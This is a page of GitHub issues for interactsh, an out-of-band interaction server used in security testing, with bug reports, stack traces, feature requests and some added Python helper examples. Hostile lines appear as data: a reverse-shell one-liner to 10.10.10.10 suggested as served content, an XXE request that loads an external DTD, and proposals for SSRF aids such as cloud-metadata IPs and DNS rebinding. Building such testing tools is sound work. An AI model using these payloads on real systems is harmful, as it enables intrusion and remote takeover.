projectdiscovery / interactsh
An OOB interaction gathering server and client library
Home Page: https://app.interactsh.com
License: MIT License
Maybe it is not very necessary, but it would be something interesting: a client for Burp Suite (Community). It is necessary to take into account that it would be extra maintenance, so no wonder they reject the idea, but still I comment.
Adding goflags support into interactsh-client and interactsh-server
Possible implementation: libpcap/xdp?
Right now, on sending an HTTP request to the interact.sh URL, we simply get the following response:
Received HTTP interaction from <ip> at <time>
It would be helpful if we could see the contents of the GET/POST content of the HTTP request, like in https://webhook.site/
Ex:
Request at target
GET customSubdomain.<interactshsubdomin>.interact.sh/someData
or
POST customSubdomain.<interactshsubdomin>.interact.sh
{
value: SomeData
}
interactsh-client logs display SomeData, or the whole JSON file.
Probably already covered by #10
application/json instead of text/plain on successful response.
/register endpoint:
HTTP/2 200 OK
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Origin: *
Content-Length: 0
Date: Sat, 11 Sep 2021 09:50:37 GMT
{"message":"registration successful"}
HTTP/2 400 Bad Request
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Origin: http://localhost:3000
Content-Type: text/plain; charset=utf-8
Content-Length: 456
Date: Sat, 11 Sep 2021 09:21:33 GMT
{"error":"could not get extra interactions: could not get id from cache"}
{"data":[],"extra":null,"aes_key":"XXX"}
@Mzack9999 we may also filter regular output with this feature.
For example, with interactsh-client -http-only or -dns-only.
Current behavior:-
[c3rbe3pe0084ii3p82sgcd5mqryyyyyyn] Received DNS interaction (A) from 103.195.200.42 at 2021-07-20 11:44:23
[c3rbe3pe0084ii3p82sgcd5mqryyyyyyn] Received DNS interaction (A) from 172.253.226.98 at 2021-07-20 11:44:23
[c3rbe3pe0084ii3p82sgcd5mqryyyyyyn] Received DNS interaction (A) from 103.195.200.42 at 2021-07-20 11:44:23
[c3rbe3pe0084ii3p82sgcd5mqryyyyyyn] Received DNS interaction (A) from 172.217.34.131 at 2021-07-20 11:44:23
[c3rbe3pe0084ii3p82sgcd5mqryyyyyyn] Received HTTP interaction from 103.22.142.125 at 2021-07-20 11:44:23
[c3rbe3pe0084ii3p82sgcd5mqryyyyyyn] Received HTTP interaction from 103.22.142.125 at 2021-07-20 11:44:23
[c3rbe3pe0084ii3p82sgcd5mqryyyyyyn] Received HTTP interaction from 103.22.142.125 at 2021-07-20 11:44:24
After support:-
[c3rbe3pe0084ii3p82sgcd5mqryyyyyyn] Received HTTP interaction from 103.22.142.125 at 2021-07-20 11:44:23
[c3rbe3pe0084ii3p82sgcd5mqryyyyyyn] Received HTTP interaction from 103.22.142.125 at 2021-07-20 11:44:23
[c3rbe3pe0084ii3p82sgcd5mqryyyyyyn] Received HTTP interaction from 103.22.142.125 at 2021-07-20 11:44:24
Originally posted by @ehsandeep in #40 (comment)
Sometimes I receive too many DNS requests from targets. I would like to be able to only retrieve HTTP requests in verbose output.
#output all requests/responses
interactsh-client -v
#output only http requests/responses
interactsh-client -v -http-only
#output only dns requests/responses
interactsh-client -v -dns-only
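The -http-only / -dns-only filter requested above can also be applied after the fact, on the client's plain-text output. The following is an added example, not code from the interactsh project: it parses lines in the format quoted in the post (the correlation id in brackets, the protocol, the optional DNS query type, the origin IP and the timestamp) and keeps only the protocols of interest. The sample log lines are constructed; the IPs and timestamps in them are made up.

```python
import re
from collections import Counter

# Constructed sample of interactsh-client output, in the line format quoted
# in the post above (IPs, query types and timestamps are made up).
SAMPLE_LOG = """\
[c3rbe3pe0084ii3p82sgcd5mqryyyyyyn] Received DNS interaction (A) from 103.195.200.42 at 2021-07-20 11:44:23
[c3rbe3pe0084ii3p82sgcd5mqryyyyyyn] Received DNS interaction (AAAA) from 172.253.226.98 at 2021-07-20 11:44:23
[c3rbe3pe0084ii3p82sgcd5mqryyyyyyn] Received HTTP interaction from 103.22.142.125 at 2021-07-20 11:44:23
[c3rbe3pe0084ii3p82sgcd5mqryyyyyyn] Received SMTP interaction from 198.51.100.7 at 2021-07-20 11:44:25
[c3rbe3pe0084ii3p82sgcd5mqryyyyyyn] Received HTTP interaction from 103.22.142.125 at 2021-07-20 11:44:24
some unrelated line that is not an interaction
"""

# One interaction per line: "[id] Received <PROTO> interaction [(QTYPE)] from <ip> at <ts>".
# The "(QTYPE)" part only appears for DNS interactions, so it is optional here.
LINE_RE = re.compile(
    r"^\[(?P<id>[a-z0-9]+)\] Received (?P<proto>DNS|HTTP|SMTP) interaction"
    r"(?: \((?P<qtype>[A-Z]+)\))? from (?P<ip>\S+) "
    r"at (?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})$"
)


def parse_line(line):
    """Return a dict with id/proto/qtype/ip/ts for an interaction line, else None."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def filter_interactions(text, protocols=None):
    """Parse all interaction lines in text, keeping only the given protocols.

    protocols is an iterable like ["http"] or ["dns", "smtp"]; None keeps all.
    Lines that do not match the interaction format are skipped silently.
    """
    wanted = {p.upper() for p in protocols} if protocols else None
    records = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if wanted is not None and rec["proto"] not in wanted:
            continue
        records.append(rec)
    return records


def summarize(text):
    """Count interactions per protocol, useful to see how noisy DNS is."""
    return Counter(rec["proto"] for rec in filter_interactions(text))


if __name__ == "__main__":
    # Equivalent of "-http-only" applied to saved output (e.g. from -o logs.txt).
    for rec in filter_interactions(SAMPLE_LOG, ["http"]):
        print(rec["ts"], rec["ip"])
    print(dict(summarize(SAMPLE_LOG)))
```

Run it against a file written with interactsh-client -o logs.txt by passing the file contents to filter_interactions; the regex deliberately anchors on the whole line so that banner lines and [INF] messages are dropped rather than mis-parsed.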
secret-key requirement upon deregister request.
correlation-id validation check upon new registration.
Block bots: if we use notify and bots crawl it, it will be noisy notifs.
interactsh-client -o logs.txt
hostmaster flag as admin@domain
origin-url flag for dynamic ACAO used for web interactsh client
Hello, I am trying to use interactsh and I need the server to listen on ports other than the default 53, 443, etc. due to a reverse proxy in front of the server. I looked at the source code and see there's a string concat with :53 for DNS, so it appears it's not possible to make this part dynamic. Could you please add the ability to listen on ports other than the default? Thanks.
Hello team,
Just a suggestion: if you can make the collab URL a wildcard (i.e. *..interact.sh resolves to .interact.sh), just the same as Burp Collaborator does.
If that can be done, that would be great.
And thanks for your awesome tools.
Hello and thank you for this awesome tool, it will surely come in handy during our testing.
Could you make the default text more easily customizable and persistent between updates for those of us using self-hosted servers? Currently it includes a line that says "If you find communications or exchanges with the Interact.sh server in your logs, it is possible that someone has been testing your applications using our hosted service, app.interact.sh."
Maybe it should detect the base domain being used by the server and display that instead?
When I run the command interactsh-server -domain mydomain.com -hostmaster [email protected] -ip [VPS IP], the following output is given without any errors:
2021/05/01 08:45:17 Creating new order for domains: [*.mydomain.com mydomain.com]
2021/05/01 08:45:17 Order created: https://acme-v02.api.letsencrypt.org/acme/order/121967319/9409571122
2021/05/01 08:45:17 Fetching authorization: https://acme-v02.api.letsencrypt.org/acme/authz-v3/12762297545
2021/05/01 08:45:17 Fetched authorization: mydomain.com
2021/05/01 08:45:27 Updating challenge for authorization mydomain.com: https://acme-v02.api.letsencrypt.org/acme/chall-v3/12762297545/FkqiUg
But the server is not giving A records when queried. I already had a Let's Encrypt cert, but even after I deleted the cert nothing changed; the same output is given.
Customize the length of the subdomain payload, for length-limited input scenarios.
The server adds an allowable length range parameter, example: -payload-length 1-16
The client specifies the length of the generated payload, example: -payload-length 4
┌──(root💀milani)-[~]
└─# go get -v github.com/projectdiscovery/interactsh/cmd/interactsh-client 127 ⨯
github.com/pierrec/lz4 (download)
cannot find package "github.com/pierrec/lz4/v4" in any of:
/usr/lib/go-1.15/src/github.com/pierrec/lz4/v4 (from $GOROOT)
/root/go/src/github.com/pierrec/lz4/v4 (from $GOPATH)
Hello and thank you for this awesome tool, it will surely come in handy during our testing.
The current behavior of interactsh is to create a randomized subdomain like c282n3l3djgbti5v595gcnenzdoyyyyyn.domain.tld, which is fine and all; however, we have a pretty nice 4 x 2 domain and we feel that smaller payloads are best, so could you allow the use of the base domain and/or customized sub-domains for self-hosted servers in addition to the randomized subdomains?
Edited to ask for customized sub-domains option as well. 👍🏻
More protocols :D
I see that you have implemented the Burp Collaborator feature of wildcard mapping to the source collaborator address.
Example: ..interact.sh -> .interact.sh
That's a great feature. But it would be great if you printed this whole ..interact.sh on the terminal whenever a query is triggered, without the verbose flag, because the verbose flag prints a lot of unwanted information (in the case of DNS queries).
Example:
If we ping anything.<UNIQUE-ID>.interact.sh
the interactsh client shows (without the verbose flag):
[<UNIQUE-ID>] Received DNS interaction (A) from <ORIGIN-IP> at <TIMESTAMP>
So the "anything" is omitted, which is sometimes important during bug bounties.
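To show why the prefix matters, here is an added example (not interactsh project code) of how the full queried name can be split into the caller-supplied prefix, the correlation id and the base domain, so the prefix can be printed alongside the id. It assumes what the client output on this page shows: the correlation id is a single 33-character alphanumeric label sitting directly under the base domain, with any extra labels in front of it.

```python
# Length of the correlation ids shown on this page
# (e.g. c3rbe3pe0084ii3p82sgcd5mqryyyyyyn); an assumption taken from that output.
CORRELATION_ID_LEN = 33


def split_interaction_host(fqdn, base_domain, id_len=CORRELATION_ID_LEN):
    """Split a queried hostname into (prefix, correlation_id).

    prefix is whatever the caller put in front of the correlation id
    (the "anything" part in the post above), or "" when there is none.
    Returns None when fqdn is not under base_domain or the label that
    should hold the id does not look like one.
    """
    host = fqdn.rstrip(".").lower()
    base = base_domain.strip(".").lower()
    # Require a real label boundary: "evilinteract.sh" must not match "interact.sh".
    if host == base or not host.endswith("." + base):
        return None
    labels = host[: -(len(base) + 1)].split(".")
    cid = labels[-1]
    if len(cid) != id_len or not cid.isalnum():
        return None
    prefix = ".".join(labels[:-1])
    return prefix, cid


def format_dns_interaction(fqdn, base_domain, origin_ip, ts, qtype="A"):
    """Render a log line that keeps the full queried name instead of just the id."""
    parts = split_interaction_host(fqdn, base_domain)
    if parts is None:
        return None
    prefix, cid = parts
    full_name = fqdn.rstrip(".").lower()
    note = f" (prefix: {prefix})" if prefix else ""
    return f"[{cid}] Received DNS interaction ({qtype}) for {full_name}{note} from {origin_ip} at {ts}"


if __name__ == "__main__":
    # Constructed query; the origin IP and timestamp are made up.
    print(format_dns_interaction(
        "anything.c3rbe3pe0084ii3p82sgcd5mqryyyyyyn.interact.sh",
        "interact.sh", "203.0.113.5", "2021-07-20 11:44:23"))
```

The lookup is done from the right-hand side of the name, so a prefix that itself contains dots ("a.b.<id>.interact.sh") is preserved intact rather than being confused with the id.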
Ref for implementation: https://github.com/SecureAuthCorp/impacket
Previously:
defaultCacheMaxSize = 5000
Now:
defaultCacheMaxSize = 1000000
How about DHCP? For example, with CVE-2019-13263, you could encode data to be sent cross-router into the 32-bit Transaction ID field. More research is needed, but obscure DHCP bugs would be cool to find. (;
Originally posted by @geeknik in #7 (comment)
This is not complete, but these are the limited available logs.
net/http.(*conn).readRequest(0xc03c1d72c0, 0x921bf8, 0xc03c80ad80, 0x0, 0x0, 0x0)
/snap/go/7954/src/net/http/server.go:966 +0x19d
net/http.(*conn).serve(0xc03c1d72c0, 0x921ca0, 0xc03c80ad80)
/snap/go/7954/src/net/http/server.go:1858 +0x705
created by net/http.(*Server).Serve
/snap/go/7954/src/net/http/server.go:2993 +0x39b
goroutine 197138914 [IO wait, 2 minutes]:
internal/poll.runtime_pollWait(0x7f922ad4b4f0, 0x72, 0xffffffffffffffff)
/snap/go/7954/src/runtime/netpoll.go:222 +0x55
internal/poll.(*pollDesc).wait(0xc09119b318, 0x72, 0x1000, 0x1000, 0xffffffffffffffff)
/snap/go/7954/src/internal/poll/fd_poll_runtime.go:87 +0x45
internal/poll.(*pollDesc).waitRead(...)
/snap/go/7954/src/internal/poll/fd_poll_runtime.go:92
internal/poll.(*FD).Read(0xc09119b300, 0xc08affa000, 0x1000, 0x1000, 0x0, 0x0, 0x0)
/snap/go/7954/src/internal/poll/fd_unix.go:166 +0x1d5
net.(*netFD).Read(0xc09119b300, 0xc08affa000, 0x1000, 0x1000, 0xc0083f8400, 0xc05a07d668, 0x89adb9)
/snap/go/7954/src/net/fd_posix.go:55 +0x4f
net.(*conn).Read(0xc0bff81610, 0xc08affa000, 0x1000, 0x1000, 0x0, 0x0, 0x0)
/snap/go/7954/src/net/net.go:183 +0x91
net/http.(*connReader).Read(0xc09170f470, 0xc08affa000, 0x1000, 0x1000, 0x4b6956, 0xc09215d08b, 0xb)
/snap/go/7954/src/net/http/server.go:780 +0x1b9
bufio.(*Reader).fill(0xc08afe7aa0)
/snap/go/7954/src/bufio/bufio.go:101 +0x108
bufio.(*Reader).ReadSlice(0xc08afe7aa0, 0xc03828f80a, 0x764367, 0xc08ac8f080, 0xb1e2ae, 0x2, 0x2)
/snap/go/7954/src/bufio/bufio.go:360 +0x3d
bufio.(*Reader).ReadLine(0xc08afe7aa0, 0x203024, 0x203024, 0x0, 0x0, 0xc03828fa78, 0x764dc5)
/snap/go/7954/src/bufio/bufio.go:389 +0x34
net/textproto.(*Reader).readLineSlice(0xc0923b0870, 0xc0922c9200, 0xc03828f9e8, 0x4dc773, 0xc09119b300, 0x43a77c)
/snap/go/7954/src/net/textproto/reader.go:57 +0xd6
net/textproto.(*Reader).ReadLine(...)
/snap/go/7954/src/net/textproto/reader.go:38
net/http.readRequest(0xc08afe7aa0, 0x0, 0xc0922c9200, 0x0, 0x0)
/snap/go/7954/src/net/http/request.go:1027 +0xaa
net/http.(*conn).readRequest(0xc0917ac140, 0x921bf8, 0xc0910ff980, 0x0, 0x0, 0x0)
/snap/go/7954/src/net/http/server.go:966 +0x19d
net/http.(*conn).serve(0xc0917ac140, 0x921ca0, 0xc0910ff980)
/snap/go/7954/src/net/http/server.go:1858 +0x705
created by net/http.(*Server).Serve
/snap/go/7954/src/net/http/server.go:2993 +0x39b
Describe the bug
Project depends on github.com/prologic/smtpd, but https://github.com/prologic/smtpd results in a 404, repo seems gone.
Error occurred when trying to open the Nuclei source in GoLand on a pristine machine.
Version
Nuclei: Trunk of master (currently at 84244b5)
Interactsh: Seems to be present in trunk, too
Screenshot of the error or bug
go list -modfile=nuclei/v2/go.mod -m -json -mod=mod all #gosetup
go: github.com/projectdiscovery/[email protected] requires
github.com/prologic/[email protected]: invalid version: git fetch -f origin refs/heads/*:refs/heads/* refs/tags/*:refs/tags/* in ~/go/pkg/mod/cache/vcs/65b3100cfa8e2061b6047e41aaceb4a1e850f70977a718cfde5bd0e009bb0722: exit status 128
Running interactsh-client without any options triggers the error below.
Version : 0.0.2
OS: OSX
$interactsh-client
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ v0.0.2
projectdiscovery.io
[FTL] Could not create client: could not make register request: POST https://interact.sh/register giving up after 6 attempts: Post "https://interact.sh/register": dial tcp: lookup interact.sh: no such host
Hello team, thanks for all the great things you do. I have an issue with the interact client where DNS requests are not logged. HTTP works fine, but whenever the request is a DNS request only, nothing works:
nslookup blahblahblah.c4l7u968kh02ipm31b50jntiyyozltipn.interact.sh
does not work at all.
Generating a new interactsh payload
User controlled poll time settings.
Multi tab support to manage / track / view multiple payloads at same time.
Filters for displaying DNS / HTTP / SMTP Interaction in default view.
Fields (same as burp only for inspiration)
Fields per interaction type
DNS
HTTP
SMTP
Misc Features
https://xsshunter.com/features
Using HTML5 canvas API for self hosted instances.
If possible, for shared public instance.
Custom URL for some content, like:
request url: http://interactsh.sh/bash, get response: sh -i >& /dev/tcp/10.10.10.10/9001 0>&1
It has been reported several times that the current domain used by the interactsh server, interact.sh, is not resolved by a few VPS providers, preventing such systems from using the interactsh client and the Nuclei integration.
The default interactsh server will now be located at https://interactsh.com. The old server (interact.sh) will remain available.
POST / HTTP/1.1
Host: company.com
Content-Type: application/xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root SYSTEM "http://ID.interact.sh/file.dtd">
<root>
<email>&pwnfromME;</email>
<password>*********</password>
</root>
Sometimes I use Responder just to collect incoming hashes from AD/Windows integrated apps.
It's not a big inconvenience for me to just configure it to listen from my privately hosted interactsh-server, but it would be nice to have a built-in listener to register/capture/note those events, don't you think?
Interactsh server version: 0.0.6
2021/10/09 22:47:15 TLS certificates are not expiring, continue!
2021/10/09 22:47:15 Listening on DNS, SMTP and HTTP ports
fatal error: runtime: out of memory
runtime stack:
runtime.throw(0xf6974e, 0x16)
/snap/go/8408/src/runtime/panic.go:1117 +0x72
runtime.sysMap(0xc0d0000000, 0x4000000, 0x161bdb0)
/snap/go/8408/src/runtime/mem_linux.go:169 +0xc6
runtime.(*mheap).sysAlloc(0x16029a0, 0x400000, 0x7fffffffffff, 0x7ff7077fdd98)
/snap/go/8408/src/runtime/malloc.go:729 +0x1e5
runtime.(*mheap).grow(0x16029a0, 0x1, 0x0)
/snap/go/8408/src/runtime/mheap.go:1346 +0x85
runtime.(*mheap).allocSpan(0x16029a0, 0x1, 0x1100, 0x1ff)
/snap/go/8408/src/runtime/mheap.go:1173 +0x609
runtime.(*mheap).alloc.func1()
/snap/go/8408/src/runtime/mheap.go:910 +0x59
runtime.systemstack(0xc000314900)
/snap/go/8408/src/runtime/asm_amd64.s:379 +0x66
runtime.mstart()
/snap/go/8408/src/runtime/proc.go:1246
Complete crash trace - interact-crash.txt
I hosted your interactsh-server on a droplet. Everything is working like a charm. But I have a question:
Can I use an old generated payload link and access its HTTP/DNS/SMTP requests within the server using the client side (interactsh-client)? Please?
➜ interactsh-client git:(main) ✗ ./interactsh-client -url https://10.10.123.237
[interactsh-client ASCII banner, v0.0.3]
projectdiscovery.io
[INF] Listing 1 URL for OOB Testing
[INF] c43v1fecie6h4kfllrvgcrd9bxeyyyyyn.10.10.123.237
How to use httplog ?
http://10.10.123.237/c43v1fecie6h4kfllrvgcrd9bxeyyyyyn
Is this supported ?
As Interactsh is about OOB interaction supporting DNS, it would be nice to have DNS rebinding at the same time.
This means having a way to get resolvable resource records with any given contents, for assisting in the detection and exploitation of SSRF-related vulnerabilities.
I have fetched a list of DNS rebinding tools, but most are hard to set up, featureless and unmaintained. The most interesting project to understand all major features is 1u.ms (source); their website describes all possibilities well.
Right now Interactsh is similar to most HTTP request collector and inspector tools, but lacks DNS rebinding.
What I said for DNS could also be meaningful for HTTP: being able to choose the body or headers served by the server.
An FTP listener would be interesting to include in Interactsh.
It would be valuable to log the authentication that an FTP client uses along with the commands they ran. It would be helpful to see the files the external client attempted to read or upload.
FTP is supported by default in Java applications where an attacker has control over a URL object. It comes up in XXE OOB testing as well.
Hey all,
I may simply be looking in the wrong place, but there seems to be little guidance on what needs to be in place for interactsh-server to succeed.
For example:
./interactsh-server -domain yoink.domain -hostmaster jc@doain -ip 44.44.44.4xx -debug
Following the guide will tell me '[ERR] Could not serve dns on port 53: listen udp 0.0.0.0:53: bind: address already in use'
and 021/07/16 10:40:30 Creating new order for domains: [*.yoink.domain yoink.domain]
2021/07/16 10:40:30 Order created: https://acme-v02.api.letsencrypt.org/acme/order/000000/00000000
2021/07/16 10:40:30 Fetching authorization: https://acme-v02.api.letsencrypt.org/acme/authz-v3/000000000
2021/07/16 10:40:30 Fetched authorization: yoink.domain
2021/07/16 10:40:40 Updating challenge for authorization yoink.domain: https://acme-v02.api.letsencrypt.org/acme/chall-v3/0000000000/8z7VSF
[FTL] Could not generate certs for auto TLS
But disabling systemd-resolved only tells me 'Could not generate certs for auto TLS', assuming I can't resolve it anymore :)
So, any pointers to what I'm not getting in regards to why this is failing? And to the title, might that be a good common document for all?
Thanks!
Linux yoinker 5.4.0-73-generic #82-Ubuntu SMP Wed Apr 14 17:39:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
Hello, currently there is no protection against anyone connecting to a self-hosted server if they know the URL. Please add some sort of authentication mechanism so that servers aren't abused. Maybe something like this?
$ interactsh-server -auth "$(uuid-gen)"
$ interactsh-client -auth "generated-uuid" -url https://domain.tld
Thank you.
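The server-side half of the suggestion above, as an added example rather than interactsh's own code: the server is started with one random token, and every client request must present it in an Authorization header before it is handled. The handler shape, the "Bearer" scheme and the token length are assumptions of this example; the point it demonstrates is that the check is applied before any other work and that the comparison is constant-time, so the token cannot be guessed byte by byte from response timing.

```python
import hmac
import secrets


def generate_token(nbytes=32):
    """Server-side start-up: one random, high-entropy token, printed once for the operator.

    The post suggests a UUID; any unguessable string works the same way, and
    32 random bytes (assumed here) leaves more margin than a UUID's 122 bits.
    """
    return secrets.token_urlsafe(nbytes)


def is_authorized(headers, expected_token):
    """Check "Authorization: Bearer <token>" against the configured token.

    hmac.compare_digest runs in time independent of where the strings first
    differ, so a wrong token is rejected without leaking how wrong it was.
    """
    value = headers.get("Authorization") or headers.get("authorization")
    if not value:
        return False
    scheme, _, presented = value.partition(" ")
    if scheme.lower() != "bearer" or not presented:
        return False
    return hmac.compare_digest(presented.encode(), expected_token.encode())


def handle_register(headers, body, expected_token):
    """Stand-in for a /register handler: returns (status, json_body).

    The token check happens first, before the request body is parsed or any
    correlation id is cached, so unauthenticated clients cost nothing.
    """
    if not is_authorized(headers, expected_token):
        return 401, {"error": "unauthorized"}
    if not isinstance(body, dict) or "correlation-id" not in body:
        return 400, {"error": "missing correlation-id"}
    # Registration logic (storing the public key and id) would go here.
    return 200, {"message": "registration successful"}


if __name__ == "__main__":
    token = generate_token()
    print("server token:", token)
    print(handle_register({"Authorization": f"Bearer {token}"},
                          {"correlation-id": "constructed-id"}, token))
    print(handle_register({}, {"correlation-id": "constructed-id"}, token))
```

Clients would send the same header on /register, /poll and /deregister; anything behind the reverse proxy mentioned elsewhere on this page should also pass the header through unchanged.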
Add 2 subdomains which resolve to various cloud provider metadata IPs.
For general cloud services, one should resolve to: 169.254.169.254
For Alibaba, one should resolve to: 100.100.100.200
Once created, the metadata-*yaml templates can be updated to use them.